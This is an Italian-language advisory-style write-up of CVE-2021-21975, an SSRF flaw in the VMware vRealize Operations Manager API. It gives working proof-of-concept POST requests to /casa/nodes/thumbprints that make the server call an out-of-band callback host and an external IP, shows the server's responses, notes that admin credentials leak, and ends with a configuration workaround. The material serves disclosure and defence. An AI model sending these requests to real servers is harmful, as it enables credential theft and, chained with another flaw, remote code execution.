
[CVE-2021-21975] VMware vRealize Operations Manager API Server Side Request Forgery (SSRF)
[CVE-2021-21975] VMware vRealize Operations Manager API Server Side Request Forgery (SSRF)
vRealize Operations (vROps) è uno strumento che offre una gestione autonoma delle operazioni IT basata sull'intelligenza artificiale, dalle applicazioni all'infrastruttura, per ottimizzare, pianificare e scalare le distribuzioni VMware Cloud e HCI, unificando al contempo il monitoraggio del cloud pubblico. Le API di VMware vRealize Operations Manager 8.4 e tutte le versioni precedenti sono vulnerabili alla Server Side Request Forgery (SSRF). Lo sfruttamento riuscito di questa vulnerabilità può portare alla lettura o all'aggiornamento di risorse interne e, in questo caso, un attaccante può facilmente sottrarre le credenziali amministrative del server vROps. Combinando CVE-2021-21975 e CVE-2021-21983, un attaccante può eseguire codice arbitrario sul server vRealize Operations remoto.
Prova di concetto (PoC): Per sfruttare questa vulnerabilità, è possibile utilizzare la seguente richiesta:
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 70
Connection: close
[
"h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975"
]
La risposta alla richiesta precedente è riportata di seguito:
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 20:59:02 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQB
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 151
[
{
"address": "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975",
"thumbprint": "<html><body>6xal4bz5uui7c8nzvu368ezjlgz</body></html>"
}
]
Inoltre, le credenziali amministrative vengono esposte nell'header Authorization.
Altre prove di concetto (PoC): Oppure è possibile utilizzare le seguenti richieste per rilevare la vulnerabilità CVE-2021-21975 VMware vRealize Operations Manager API Server Side Request Forgery (SSRF):
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close
[
"78.171.203.41:8000/CVE-2021-21975"
]
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:03 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQE
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 67
[
{
"address":"78.171.203.41:8000/CVE-2021-21975",
"thumbprint":null
}
]
POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close
[
"78.171.203.41:8000"
]
HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:39 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQJ
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 52
[
{
"address":"78.171.203.41:8000",
"thumbprint":null
}
]
Soluzione alternativa: Se non è possibile installare la patch, oppure se non esiste una patch per la propria versione di vRealize Operations, è possibile adottare i seguenti passaggi per aggirare il problema. L'applicazione di questa soluzione alternativa non comporta alcun impatto su vRealize Operations.
Per aggirare questo problema in vRealize Operations, rimuovere una riga di configurazione da casa-security-context.xml
/usr/lib/vmware-casa/casa-webapp/webapps/casa/WEB-INF/classes/spring/casa-security-context.xml<sec:http pattern="/nodes/thumbprints" security='none'/>service vmware-casa restartPer maggiori informazioni, visitare le seguenti pagine.
https://kb.vmware.com/s/article/83210
https://www.vmware.com/security/advisories/VMSA-2021-0004.html
https://f5.pm/go-66465.html